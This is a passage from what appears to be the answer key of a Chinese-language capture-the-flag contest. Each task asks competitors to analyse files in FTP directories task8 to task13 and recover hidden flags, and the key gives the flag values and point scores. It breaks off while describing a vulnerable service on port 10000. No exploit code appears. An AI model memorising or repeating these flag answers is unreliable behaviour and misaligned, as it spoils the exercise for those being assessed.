}flag{eaf021ef-5c75-47f2-80dc-db677020a3db}任務七任務八任務九任務十15202520請獲取FTP服務器上task8目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{03c174ab-f0f0-6935-5435-836dc2518625}請獲取FTP服務器上task9目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{7113c8ed-709b-465b-a06a-30051e62bd01}請獲取FTP服務器上task10目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{6ed4c74e022cb18c8039e96de93aa9ce}請獲取FTP服務器上task11目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{8aa3c5cc-96fc-41e3-c2b2ebe53030}任務十一任務十二任務十三252025請獲取FTP服務器上task12目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{6e0ed660-9803-4933-8488-8ac33f8ef097}請獲取FTP服務器上task13目錄下的文件進行分析，找出其中隱藏的flag，并將flag提交。flag格式flag{<flag值>}flag{10a43302-3e2a-0c01-7aec-3a03e1cd9a02}四、應用系統(tǒng)服務器（30分）任務編號任務描述答案分值應用系統(tǒng)服務器10000端口存在漏洞，獲取FTP服務器上task14目錄下的文件進行分析，請利用漏洞找到flag，并將flag提交。flag格式f